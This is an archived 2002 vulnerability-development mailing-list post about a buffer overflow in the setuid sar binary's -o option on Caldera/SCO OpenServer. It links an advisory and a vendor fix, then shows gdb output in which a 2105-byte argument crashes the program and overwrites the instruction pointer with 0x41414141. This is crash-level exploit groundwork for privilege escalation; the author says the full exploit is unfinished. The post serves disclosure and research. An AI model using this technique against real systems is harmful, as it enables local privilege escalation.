Vulnerability Development mailing list archives
Sar -o exploitation process info.
From: KF <dotslash () snosoft com>
Date: Thu, 09 May 2002 05:29:43 -0400
Caldera recently released an update for the suid sar binary. At one point in time someone pointed out that sar -f had an overflow (Brok Tellier or k2 probably I can't remember). The -f overflow was fixed but the -o option (which I have seen in private security advisorys floating around) also had an overflow but I don't think anyone ever told Caldera / SCO. I haven't gotten around to finishing up the exploit but here are the details for those of you that are interested.
Sec focus bid: http://online.securityfocus.com/advisories/4089 Caldera fix: ftp://stage.caldera.com/pub/security/openserver/CSSA-2002-SCO.17 Exploit details: Starting program: //home/kevin//./sar -o `perl -e 'print "A" x 2104'` //home/kevin//./sar: Cannot create file AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.l Program exited with code 01. Try again with one more char. (gdb) r -o `perl -e 'print "A" x 2105'` Starting program: //home/kevin//./sar -o `perl -e 'print "A" x 2105'` Program received signal SIGSEGV, Segmentation fault. 0x80021c2d in getenv () (gdb) bt #0 0x80021c2d in getenv () #1 0x8001f2da in _tz_info () #2 0x8004e5c2 in tzset () #3 0x8004e4ba in _localtime_r () #4 0x8001db5f in localtime () #5 0x804a124 in memset () #6 0x41414141 in ?? () Cannot access memory at address 0x41414141. (gdb) frame 6 #6 0x41414141 in ?? () (gdb) i r eax 0x8001db20 -2147362016 ecx 0x54 84 edx 0x804765c 134510172 ebx 0x0 0 esp 0x80463d4 0x80463d4 ebp 0x41414141 0x41414141 esi 0x804764c 134510156 edi 0x0 0 eip 0x41414141 0x41414141 ps 0x10206 66054 cs 0x17 23 ss 0x1f 31 ds 0x1f 31 es 0x1f 31 fs 0x0 0 gs 0x0 0 -KF
Current thread:
- Sar -o exploitation process info. KF (May 09)